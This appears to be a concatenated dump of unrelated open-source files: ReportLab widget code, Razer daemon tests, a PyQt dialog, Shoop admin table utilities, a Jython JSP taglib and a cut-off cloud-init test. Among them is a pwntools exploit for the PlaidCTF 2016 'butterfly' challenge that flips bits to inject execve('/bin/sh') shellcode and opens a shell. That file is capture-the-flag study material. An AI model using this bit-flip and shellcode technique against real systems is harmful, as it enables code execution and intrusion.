def __init__(self, *elements):
self.contents = []
self.fillColor = colors.cyan
self.strokeColor = colors.magenta
for elem in elements:
self.add(elem)
def _addNamedNode(self,name,node):
'if name is not None add an attribute pointing to node and add to the attrMap'
if name:
if name not in self._attrMap.keys():
self._attrMap[name] = AttrMapValue(isValidChild)
setattr(self, name, node)
def add(self, node, name=None):
"""Appends non-None child node to the 'contents' attribute. In addition,
if a name is provided, it is subsequently accessible by name
"""
# propagates properties down
if node is not None:
assert isValidChild(node), "Can only add Shape or UserNode objects to a Group"
self.contents.append(node)
self._addNamedNode(name,node)
def getBounds(self):
# get bounds of each object
if self.contents:
b = []
for elem in self.contents:
b.append(elem.getBounds())
return shapes.getRectsBounds(b)
else:
return (0,0,0,0)
def draw(self):
g = shapes.Group()
(x1, y1, x2, y2) = self.getBounds()
r = shapes.Rect(
x = x1,
y = y1,
width = x2-x1,
height = y2-y1,
fillColor = self.fillColor,
strokeColor = self.strokeColor
)
g.add(r)
for elem in self.contents:
g.add(elem)
return g
def test():
from reportlab.graphics.charts.piecharts import WedgeProperties
wedges = TypedPropertyCollection(WedgeProperties)
wedges.fillColor = colors.red
wedges.setVector(fillColor=(colors.blue,colors.green,colors.white))
print len(_ItemWrapper)
d = shapes.Drawing(400, 200)
tc = TwoCircles()
d.add(tc)
import renderPDF
renderPDF.drawToFile(d, 'sample_widget.pdf', 'A Sample Widget')
print 'saved sample_widget.pdf'
d = shapes.Drawing(400, 200)
f = Face()
f.skinColor = colors.yellow
f.mood = "sad"
d.add(f, name='theFace')
print 'drawing 1 properties:'
d.dumpProperties()
renderPDF.drawToFile(d, 'face.pdf', 'A Sample Widget')
print 'saved face.pdf'
d2 = d.expandUserNodes()
renderPDF.drawToFile(d2, 'face_copy.pdf', 'An expanded drawing')
print 'saved face_copy.pdf'
print 'drawing 2 properties:'
d2.dumpProperties()
if __name__=='__main__':
test()
| bsd-3-clause | -6,657,977,910,297,390,000 | 33.846939 | 111 | 0.561856 | false |
parksjin01/ctf | 2016/Plaid/butterfly.py | 1 | 1767 | #!/usr/bin/env python2
from pwn import *
#r = remote('butterfly.pwning.xxx', 9999)
r = process('./butterfly')
loop_val = '0x20041c6'
# Start the loop
r.sendline(loop_val)
# Generate the payload
start_addr = 0x40084a
shell_addr = 0x400914
shellcode = '4831f648c7c03b0000004831d248c7c7140940000f05'
text = '4531f664488b042528000000483b44244075264489f0'
shell = ''.join('{:02x}'.format(ord(c)) for c in list('/bin/sh\0'))
greeting = 'THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?'[0:8]
greeting = ''.join('{:02x}'.format(ord(c)) for c in greeting)
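# Each number sent to the service encodes a single bit to flip, addressed as
# (byte_address * 8) + bit_index. Below we XOR the bytes currently at
# start_addr (the `text` hex string) with our shellcode, and the stored
# greeting with "/bin/sh\0", sending one flip per differing bit.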
# We need to process the payload byte by byte
chunks_sc = [shellcode[i:i+2] for i in range(0, len(shellcode), 2)]
chunks_tx = [text[i:i+2] for i in range(0, len(text), 2)]
# loop over each byte
for i in range(0,len(chunks_tx)):
# compute the flips needed
flips = list('{:08b}'.format(int(chunks_tx[i],16) ^ int(chunks_sc[i], 16)))
flips.reverse()
indices = []
# store the offsets of the flips in a table
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
# for each flip send a corresponding number
for n in indices:
r.sendline('0x{:x}'.format((start_addr + i) * 8 + n))
#Same for the greeting and shell
chunks_sh = [shell[i:i+2] for i in range(0, len(shell), 2)]
chunks_gr = [greeting[i:i+2] for i in range(0, len(greeting), 2)]
for i in range(0,len(chunks_gr)):
flips = list('{:08b}'.format(int(chunks_gr[i],16) ^ int(chunks_sh[i], 16)))
flips.reverse()
indices = []
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
for n in indices:
r.sendline('0x{:x}'.format((shell_addr + i) * 8 + n))
# Reset the call to mprotect
r.sendline(loop_val)
r.clean()
r.interactive()
| mit | -8,768,587,543,166,460,000 | 30.553571 | 79 | 0.633843 | false |
z3ntu/razer-drivers | pylib/tests/integration_tests/test_device_manager.py | 1 | 11809 | import multiprocessing
import os
import signal
import tempfile
import time
import unittest
import shutil
import razer.client
import razer_daemon.daemon
import razer._fake_driver as fake_driver
import coverage
def run_daemon(daemon_dir, driver_dir):
# TODO console_log false
razer_daemon.daemon.daemonize(foreground=True, verbose=True, console_log=False, run_dir=daemon_dir, pid_file=os.path.join(daemon_dir, 'razer-daemon.pid'), test_dir=driver_dir)
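# The tests below exercise a real daemon instance spawned in a separate
# process, backed by fake sysfs endpoints created in a temporary directory,
# so no physical Razer hardware is required.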
class DeviceManagerTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._daemon_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemondata')
cls._tmp_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemontest')
cls._bw_serial = 'IO0000000000001'
cls._bw_chroma = fake_driver.FakeDevice('razerblackwidowchroma', serial=cls._bw_serial, tmp_dir=cls._tmp_dir)
print("Created BlackWidow Chroma endpoints")
cls._daemon_proc = multiprocessing.Process(target=run_daemon, args=(cls._daemon_dir, cls._tmp_dir))
cls._daemon_proc.start()
print("Started daemon")
time.sleep(5)
@classmethod
def tearDownClass(cls):
print("Stopping daemon")
os.kill(cls._daemon_proc.pid, signal.SIGINT)
time.sleep(3)
if cls._daemon_proc.is_alive():
print("Daemon still alive...")
time.sleep(8)
if cls._daemon_proc.is_alive():
cls._daemon_proc.terminate()
if cls._daemon_proc.is_alive():
print("Failed to kill daemon")
cls._bw_chroma.close()
shutil.rmtree(cls._tmp_dir)
shutil.rmtree(cls._daemon_dir)
time.sleep(5)
def setUp(self):
self._bw_chroma.create_endpoints()
self.device_manager = razer.client.DeviceManager()
def test_device_list(self):
self.assertEqual(len(self.device_manager.devices), 1)
def test_serial(self):
device = self.device_manager.devices[0]
self.assertEqual(device.serial, self._bw_chroma.get('get_serial'))
def test_name(self):
device = self.device_manager.devices[0]
self.assertEqual(device.name, self._bw_chroma.get('device_type'))
def test_type(self):
device = self.device_manager.devices[0]
self.assertEqual(device.type, 'keyboard')
def test_fw_version(self):
device = self.device_manager.devices[0]
self.assertEqual(device.firmware_version, self._bw_chroma.get('get_firmware_version'))
def test_brightness(self):
device = self.device_manager.devices[0]
# Test 100%
device.brightness = 100.0
self.assertEqual('255', self._bw_chroma.get('set_brightness'))
self.assertEqual(100.0, device.brightness)
device.brightness = 50.0
self.assertEqual('127', self._bw_chroma.get('set_brightness'))
self.assertAlmostEqual(50.0, device.brightness, delta=0.4)
device.brightness = 0.0
self.assertEqual('0', self._bw_chroma.get('set_brightness'))
self.assertEqual(0, device.brightness)
def test_capabilities(self):
device = self.device_manager.devices[0]
self.assertEqual(device.capabilities, device._capabilities)
def test_device_keyboard_game_mode(self):
device = self.device_manager.devices[0]
self._bw_chroma.set('mode_game', '1')
self.assertTrue(device.game_mode_led)
device.game_mode_led = False
self.assertEqual(self._bw_chroma.get('mode_game'), '0')
device.game_mode_led = True
self.assertEqual(self._bw_chroma.get('mode_game'), '1')
def test_device_keyboard_macro_mode(self):
device = self.device_manager.devices[0]
self._bw_chroma.set('mode_macro', '1')
self.assertTrue(device.macro_mode_led)
device.macro_mode_led = False
self.assertEqual(self._bw_chroma.get('mode_macro'), '0')
device.macro_mode_led = True
self.assertEqual(self._bw_chroma.get('mode_macro'), '1')
self._bw_chroma.set('mode_macro_effect', '0')
self.assertEqual(device.macro_mode_led_effect, razer.client.constants.MACRO_LED_STATIC)
device.macro_mode_led_effect = razer.client.constants.MACRO_LED_BLINK
self.assertEqual(self._bw_chroma.get('mode_macro'), str(razer.client.constants.MACRO_LED_BLINK))
def test_device_keyboard_effect_none(self):
device = self.device_manager.devices[0]
device.fx.none()
self.assertEqual(self._bw_chroma.get('mode_none'), '1')
def test_device_keyboard_effect_spectrum(self):
device = self.device_manager.devices[0]
device.fx.spectrum()
self.assertEqual(self._bw_chroma.get('mode_spectrum'), '1')
def test_device_keyboard_effect_wave(self):
device = self.device_manager.devices[0]
device.fx.wave(razer.client.constants.WAVE_LEFT)
self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_LEFT))
device.fx.wave(razer.client.constants.WAVE_RIGHT)
self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_RIGHT))
with self.assertRaises(ValueError):
device.fx.wave('lalala')
def test_device_keyboard_effect_static(self):
device = self.device_manager.devices[0]
device.fx.static(255, 0, 255)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.static(red, green, blue)
device.fx.static(256, 0, 700)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
def test_device_keyboard_effect_reactive(self):
device = self.device_manager.devices[0]
time = razer.client.constants.REACTIVE_500MS
device.fx.reactive(255, 0, 255, time)
self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.reactive(red, green, blue, time)
device.fx.reactive(256, 0, 700, time)
self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
with self.assertRaises(ValueError):
device.fx.reactive(255, 0, 255, 'lalala')
def test_device_keyboard_effect_breath_single(self):
device = self.device_manager.devices[0]
device.fx.breath_single(255, 0, 255)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.breath_single(red, green, blue)
device.fx.breath_single(256, 0, 700)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
def test_device_keyboard_effect_breath_dual(self):
device = self.device_manager.devices[0]
device.fx.breath_dual(255, 0, 255, 255, 0, 0)
self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
for r1, g1, b1, r2, g2, b2 in ((256.0, 0, 0, 0, 0, 0), (0, 256.0, 0, 0, 0, 0), (0, 0, 256.0, 0, 0, 0),
(0, 0, 0, 256.0, 0, 0), (0, 0, 0, 0, 256.0, 0), (0, 0, 0, 0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.breath_dual(r1, g1, b1, r2, g2, b2)
device.fx.breath_dual(256, 0, 700, 255, 0, 0)
self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
def test_device_keyboard_effect_breath_random(self):
device = self.device_manager.devices[0]
device.fx.breath_random()
self.assertEqual(self._bw_chroma.get('mode_breath'), '1')
def test_device_keyboard_effect_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple(255, 0, 255, refresh_rate)
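        # ripple frames are emitted asynchronously; the short sleep below gives the effect time to write at least one custom frame before we read it back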
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.reactive(red, green, blue, refresh_rate)
with self.assertRaises(ValueError):
device.fx.reactive(255, 0, 255, 'lalala')
device.fx.none()
def test_device_keyboard_effect_random_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple_random(refresh_rate)
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
with self.assertRaises(ValueError):
device.fx.ripple_random('lalala')
device.fx.none()
def test_device_keyboard_effect_framebuffer(self):
device = self.device_manager.devices[0]
device.fx.advanced.matrix.set(0, 0, (255, 0, 255))
self.assertEqual(device.fx.advanced.matrix.get(0, 0), (255, 0, 255))
device.fx.advanced.draw()
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\x00\xFF')
device.fx.advanced.matrix.to_framebuffer() # Save 255, 0, 255
device.fx.advanced.matrix.reset() # Clear FB
device.fx.advanced.matrix.set(0, 0, (0, 255, 0))
device.fx.advanced.draw_fb_or() # Draw FB or'd with Matrix
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\xFF\xFF')
# Append that to FB
device.fx.advanced.matrix.to_framebuffer_or()
device.fx.advanced.draw()
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
binary = device.fx.advanced.matrix.to_binary()
self.assertEqual(binary, custom_effect_payload)
def test_device_keyboard_macro_enable(self):
device = self.device_manager.devices[0]
device.macro.enable_macros()
self.assertEqual(self._bw_chroma.get('macro_keys'), '1')
def test_device_keyboard_macro_add(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M1', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M1', macros)
with self.assertRaises(ValueError):
device.macro.add_macro('M6', url_macro) # Unknown key
with self.assertRaises(ValueError):
            device.macro.add_macro('M1', 'lalala') # Not a sequence
with self.assertRaises(ValueError):
device.macro.add_macro('M1', ['lalala']) # Bad element in sequence
def test_device_keyboard_macro_del(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M2', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M2', macros)
device.macro.del_macro('M2')
macros = device.macro.get_macros()
self.assertNotIn('M2', macros)
with self.assertRaises(ValueError):
device.macro.del_macro('M6') # Unknown key | gpl-2.0 | 2,036,554,613,844,915,700 | 34.359281 | 179 | 0.62825 | false |
nesaro/driza | pyrqt/iuqt4/dsplash.py | 1 | 3768 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#Copyright (C) 2006-2008 Néstor Arocha Rodríguez
#This file is part of pyrqt.
#
#pyrqt is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#pyrqt is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with pyrqt; if not, write to the Free Software
#Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Dialogo splash que precede a la ventana principal"""
#textBrowser1: La ventana con las opciones
#pixmapLabel1: La fotografia
from PyQt4 import QtCore,QtGui
from pyrqt.iuqt4.ui.dsplash import Ui_DialogoSplash
from PyQt4.QtGui import QMessageBox
import logging
log = logging.getLogger(__name__)
class DSplash(QtGui.QDialog):
"""Dialogo que muestra un acceso rápido a las acciones que puede realizar el usuario"""
def __init__(self, parent, gestortemas, config, vsalida):
QtGui.QDialog.__init__(self, parent)
        #PRIVATE VARIABLES
self.ui=Ui_DialogoSplash()
self.ui.setupUi(self)
self.__textohtml = ""
self.__config = config
self.__vsalida = vsalida
self.ui.label.setPixmap(gestortemas.portada())
self.__conexiones()
self.__inithtml()
self.ui.textBrowser.append(self.__textohtml)
    #PRIVATE FUNCTIONS
def __conexiones(self):
"""Bloque de conexiones"""
from PyQt4.QtCore import SIGNAL
#self.connect(self.ui.textBrowser,SIGNAL("sourceChanged(const QUrl & )"),self.__enlace)
self.connect(self.ui.textBrowser,SIGNAL("anchorClicked(const QUrl & )"),self.__enlace)
def __inithtml(self):
"""Devuelve el html que muestra la ventana"""
self.__textohtml="<table> \\ <tr><td><a href=\"nuevo\">Nuevo Proyecto</a></td></tr> <tr> <td><a href=\"abrir\">Abrir Proyecto</a></td></tr><tr><td><hr></td></tr>"
for i in range(len(self.__config.configuracion["lfichero"])):
try:
nfichero=self.__config.configuracion["lfichero"][i]
ristra="<tr><td><a href=\"%d\">%s</a></td></tr>" % (i,nfichero)
self.__textohtml+=ristra
except:
i=4
self.__textohtml+="<tr><td><hr></td></tr><tr><td><a href=\"salida\">Dialogo de salida</a></td></tr></table>"
def __enlace(self, parametro):
"""Define las acciones que realizará el programa tras pulsar en un enlace"""
log.debug("Pulsado enlace"+parametro.toString())
parametro = parametro.toString()
self.ui.textBrowser.setSource(QtCore.QUrl(""))
if parametro == "nuevo":
self.accept()
elif parametro == "abrir":
if self.parent().abrir_proyecto(self):
self.accept()
elif parametro == "0" or parametro == "1" or \
parametro=="2" or parametro=="3" or \
parametro=="4":
if self.parent().abrir_proyecto(self, self.__config.configuracion["lfichero"][eval(str(parametro))]):
self.accept()
elif parametro == "salida":
self.parent().hide()
self.__vsalida.show()
self.accept()
else:
self.reject()
return
def __errormsg(self,msg=None):
if not msg:
msg="Generado error"
QMessageBox.critical(self,u'Error!', msg)
| gpl-2.0 | 991,958,256,241,659,000 | 36.64 | 170 | 0.619022 | false |
taedori81/shoop | shoop/admin/utils/picotable.py | 1 | 13367 | # -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import json
import six
from django.core.paginator import EmptyPage, Paginator
from django.db.models import Count, Manager, Q, QuerySet
from django.http.response import JsonResponse
from django.template.defaultfilters import yesno
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from shoop.admin.utils.urls import get_model_url, NoModelUrl
from shoop.utils.dates import try_parse_date
from shoop.utils.objects import compact
from shoop.utils.serialization import ExtendedJSONEncoder
def maybe_callable(thing, context=None):
"""
If `thing` is callable, return it.
If `thing` names a callable attribute of `context`, return it.
"""
if callable(thing):
return thing
if isinstance(thing, six.string_types):
thing = getattr(context, thing, None)
if callable(thing):
return thing
return None
def maybe_call(thing, context, args=None, kwargs=None):
"""
If `thing` is callable, call it with args and kwargs and return the value.
If `thing` names a callable attribute of `context`, call it with args and kwargs and return the value.
Otherwise return `thing`.
"""
func = maybe_callable(context=context, thing=thing)
if func:
thing = func(*(args or ()), **(kwargs or {}))
return thing
class Filter(object):
type = None
def to_json(self, context):
return None
def filter_queryset(self, queryset, column, value):
return queryset # pragma: no cover
class ChoicesFilter(Filter):
type = "choices"
def __init__(self, choices=None, filter_field=None):
self.filter_field = filter_field
self.choices = choices
def _flatten_choices(self, context):
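        """Resolve the configured choices into a list of (value, label) pairs, prefixed with an empty choice."""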
if not self.choices:
return None
choices = maybe_call(self.choices, context=context)
if isinstance(choices, QuerySet):
choices = [(c.pk, c) for c in choices]
return [(None, "")] + [
(force_text(value, strings_only=True), force_text(display))
for (value, display)
in choices
]
def to_json(self, context):
return {
"choices": self._flatten_choices(context)
}
def filter_queryset(self, queryset, column, value):
return queryset.filter(**{(self.filter_field or column.id): value})
class RangeFilter(Filter):
type = "range"
def __init__(self, min=None, max=None, step=None, field_type=None, filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param min: Minimum value.
:param max: Maximum value.
:param step: Step value. See the HTML5 documentation for semantics.
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
"""
self.filter_field = filter_field
self.min = min
self.max = max
self.step = step
self.field_type = field_type
def to_json(self, context):
return {
"range": compact({
"min": maybe_call(self.min, context=context),
"max": maybe_call(self.max, context=context),
"step": maybe_call(self.step, context=context),
"type": self.field_type,
})
}
def filter_queryset(self, queryset, column, value):
if value:
min = value.get("min")
max = value.get("max")
q = {}
filter_field = (self.filter_field or column.id)
if min is not None:
q["%s__gte" % filter_field] = min
if max is not None:
q["%s__lte" % filter_field] = max
if q:
queryset = queryset.filter(**q)
return queryset
class DateRangeFilter(RangeFilter):
def __init__(self, *args, **kwargs):
super(DateRangeFilter, self).__init__(*args, **kwargs)
if not self.field_type:
self.field_type = "date"
def filter_queryset(self, queryset, column, value):
if value:
value = {
"min": try_parse_date(value.get("min")),
"max": try_parse_date(value.get("max")),
}
return super(DateRangeFilter, self).filter_queryset(queryset, column, value)
class TextFilter(Filter):
type = "text"
def __init__(self, field_type=None, placeholder=None, operator="icontains", filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
:param placeholder: Field placeholder string.
:type placeholder: str|None
:param operator: Django operator for the queryset.
:type operator: str
"""
self.filter_field = filter_field
self.field_type = field_type
self.placeholder = placeholder
self.operator = operator
def to_json(self, context):
return {
"text": compact({
"type": self.field_type,
"placeholder": force_text(self.placeholder) if self.placeholder else None,
})
}
def filter_queryset(self, queryset, column, value):
if value:
value = force_text(value).strip()
if value:
return queryset.filter(**{"%s__%s" % ((self.filter_field or column.id), self.operator): value})
return queryset
class MultiFieldTextFilter(TextFilter):
def __init__(self, filter_fields, **kwargs):
"""
        :param filter_fields: List of filter fields (Django query expressions).
        :type filter_fields: list<str>
:param kwargs: Kwargs for `TextFilter`.
"""
super(MultiFieldTextFilter, self).__init__(**kwargs)
self.filter_fields = tuple(filter_fields)
def filter_queryset(self, queryset, column, value):
if value:
q = Q()
for filter_field in self.filter_fields:
q |= Q(**{"%s__%s" % (filter_field, self.operator): value})
return queryset.filter(q)
return queryset
true_or_false_filter = ChoicesFilter([
(False, _("no")),
(True, _("yes"))
])
class Column(object):
def __init__(self, id, title, **kwargs):
self.id = id
self.title = title
self.sort_field = kwargs.pop("sort_field", id)
self.display = kwargs.pop("display", id)
self.class_name = kwargs.pop("class_name", None)
self.filter_config = kwargs.pop("filter_config", None)
self.sortable = bool(kwargs.pop("sortable", True))
self.linked = bool(kwargs.pop("linked", True))
        if kwargs and type(self) is Column:  # if not subclassed, reject unexpected kwargs so typos don't pass silently
raise NameError("Unexpected kwarg(s): %s" % kwargs.keys())
def to_json(self, context=None):
out = {
"id": force_text(self.id),
"title": force_text(self.title),
"className": force_text(self.class_name) if self.class_name else None,
"filter": self.filter_config.to_json(context=context) if self.filter_config else None,
"sortable": bool(self.sortable),
"linked": bool(self.linked),
}
return dict((key, value) for (key, value) in six.iteritems(out) if value is not None)
def sort_queryset(self, queryset, desc=False):
order_by = ("-" if desc else "") + self.sort_field
queryset = queryset.order_by(order_by)
if self.sort_field.startswith("translations__"):
# Ref http://archlinux.me/dusty/2010/12/07/django-dont-use-distinct-and-order_by-across-relations/
queryset = queryset.annotate(_dummy_=Count(self.sort_field))
return queryset
def filter_queryset(self, queryset, value):
if self.filter_config:
queryset = self.filter_config.filter_queryset(queryset, self, value)
return queryset
def get_display_value(self, context, object):
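        """Return the text shown for ``object`` in this column: call ``display`` if it is callable, otherwise follow it as a ``__``-separated attribute path."""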
display_callable = maybe_callable(self.display, context=context)
if display_callable:
return display_callable(object)
value = object
for bit in self.display.split("__"):
value = getattr(value, bit, None)
if isinstance(value, bool):
value = yesno(value)
if isinstance(value, Manager):
value = ", ".join("%s" % x for x in value.all())
return force_text(value)
class Picotable(object):
def __init__(self, request, columns, queryset, context):
self.request = request
self.columns = columns
self.queryset = queryset
self.context = context
self.columns_by_id = dict((c.id, c) for c in self.columns)
self.get_object_url = maybe_callable("get_object_url", context=self.context)
self.get_object_abstract = maybe_callable("get_object_abstract", context=self.context)
def process_queryset(self, query):
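        """Apply the filters and sort order requested in ``query`` to the base queryset."""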
queryset = self.queryset
filters = (query.get("filters") or {})
for column, value in six.iteritems(filters):
column = self.columns_by_id.get(column)
if column:
queryset = column.filter_queryset(queryset, value)
sort = query.get("sort")
if sort:
desc = (sort[0] == "-")
column = self.columns_by_id.get(sort[1:])
if not (column and column.sortable):
raise ValueError("Can't sort by column %r" % sort[1:])
queryset = column.sort_queryset(queryset, desc=desc)
return queryset
def get_data(self, query):
paginator = Paginator(self.process_queryset(query), query["perPage"])
try:
page = paginator.page(int(query["page"]))
except EmptyPage:
page = paginator.page(paginator.num_pages)
out = {
"columns": [c.to_json(context=self.context) for c in self.columns],
"pagination": {
"perPage": paginator.per_page,
"nPages": paginator.num_pages,
"nItems": paginator.count,
"pageNum": page.number,
},
"items": [self.process_item(item) for item in page],
"itemInfo": _("Showing %(per_page)s of %(n_items)s %(verbose_name_plural)s") % {
"per_page": min(paginator.per_page, paginator.count),
"n_items": paginator.count,
"verbose_name_plural": self.get_verbose_name_plural(),
}
}
return out
def process_item(self, object):
out = {
"_id": object.id,
"_url": (self.get_object_url(object) if callable(self.get_object_url) else None),
}
for column in self.columns:
out[column.id] = column.get_display_value(context=self.context, object=object)
out["_abstract"] = (self.get_object_abstract(object, item=out) if callable(self.get_object_abstract) else None)
return out
def get_verbose_name_plural(self):
try:
return self.queryset.model._meta.verbose_name_plural
except AttributeError:
return _("objects")
class PicotableViewMixin(object):
columns = []
picotable_class = Picotable
template_name = "shoop/admin/base_picotable.jinja"
def process_picotable(self, query_json):
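        """Build a Picotable for this view's queryset and return the data for the given JSON query as a JsonResponse."""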
pico = self.picotable_class(
request=self.request,
columns=self.columns,
queryset=self.get_queryset(),
context=self
)
return JsonResponse(pico.get_data(json.loads(query_json)), encoder=ExtendedJSONEncoder)
def get(self, request, *args, **kwargs):
query = request.GET.get("jq")
if query:
return self.process_picotable(query)
return super(PicotableViewMixin, self).get(request, *args, **kwargs)
def get_object_url(self, instance):
try:
return get_model_url(instance)
except NoModelUrl:
pass
return None
def get_object_abstract(self, instance, item):
"""
Get the object abstract lines (used for mobile layouts) for this object.
Supported keys in abstract line dicts are:
* text (required)
* title
* class (CSS class name -- `header` for instance)
* raw (boolean; whether or not the `text` is raw HTML)
:param instance: The instance
:param item: The item dict so far. Useful for reusing precalculated values.
:return: Iterable of dicts to pass through to the picotable javascript
:rtype: Iterable[dict]
"""
return None
def get_filter(self):
filter_string = self.request.GET.get("filter")
return json.loads(filter_string) if filter_string else {}
| agpl-3.0 | 7,626,388,386,203,150,000 | 33.992147 | 119 | 0.597292 | false |
ActiveState/code | recipes/Python/252132_generic_jythtaglib/recipe-252132.py | 1 | 3673 | ## store this into classes/jython/get.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
import org.python.core.*;
public class get extends TagSupport{
public PythonInterpreter interp;
public String cmd;
protected PageContext pageContext;
public get(){super();}
public void setVar(String cmd){this.cmd=cmd;}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public int doEndTag() throws javax.servlet.jsp.JspTagException{
try{
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
String res=interp.eval(cmd).toString();
pageContext.getOut().write(res);
}catch(java.io.IOException e){
throw new JspTagException("IO Error: " + e.getMessage());
}
return EVAL_PAGE;
}
}
## store this into classes/jython/exec.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
public class exec extends BodyTagSupport{
public PythonInterpreter interp;
public void setParent(Tag parent) {
this.parent = parent;
}
public void setBodyContent(BodyContent bodyOut) {
this.bodyOut = bodyOut;
}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public Tag getParent() {
return this.parent;
}
public int doStartTag() throws JspException {
return EVAL_BODY_TAG;
}
public int doEndTag() throws JspException {
return EVAL_PAGE;
}
// Default implementations for BodyTag methods as well
// just in case a tag decides to implement BodyTag.
public void doInitBody() throws JspException {
}
public int doAfterBody() throws JspException {
String cmd = bodyOut.getString();
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
interp.set("pageContext",pageContext);
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
interp.exec(cmd);
return SKIP_BODY;
}
public void release() {
bodyOut = null;
pageContext = null;
parent = null;
}
protected BodyContent bodyOut;
protected PageContext pageContext;
protected Tag parent;
}
## store this into jsp/jython.tld
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE taglib PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.1//EN" "http://java.sun.com/j2ee/dtds/web-jsptaglibrary_1_1.dtd">
<taglib>
<tlibversion>1.0</tlibversion>
<jspversion>1.1</jspversion>
<shortname>jython</shortname>
<info>
A simple Jython tag library
</info>
<tag>
<name>exec</name>
<tagclass>jython.exec</tagclass>
</tag>
<tag>
<name>get</name>
<tagclass>jython.get</tagclass>
<bodycontent>empty</bodycontent>
<attribute>
<name>var</name>
<required>true</required>
</attribute>
</tag>
</taglib>
## add this to the web.xml file
<taglib>
<taglib-uri>http://www.jython.org</taglib-uri>
<taglib-location>/WEB-INF/jsp/jython.tld</taglib-location>
</taglib>
| mit | -4,884,085,414,985,294,000 | 25.615942 | 139 | 0.643616 | false |
cbuben/cloud-init | tests/unittests/test_handler/test_handler_yum_add_repo.py | 1 | 2372 | from cloudinit import util
from cloudinit.config import cc_yum_add_repo
from .. import helpers
import logging
from StringIO import StringIO
import configobj
LOG = logging.getLogger(__name__)
class TestConfig(helpers.FilesystemMockingTestCase):
def setUp(self):
super(TestConfig, self).setUp()
self.tmp = self.makeDir(prefix="unittest_")
def test_bad_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
# Missing this should cause the repo not to be written
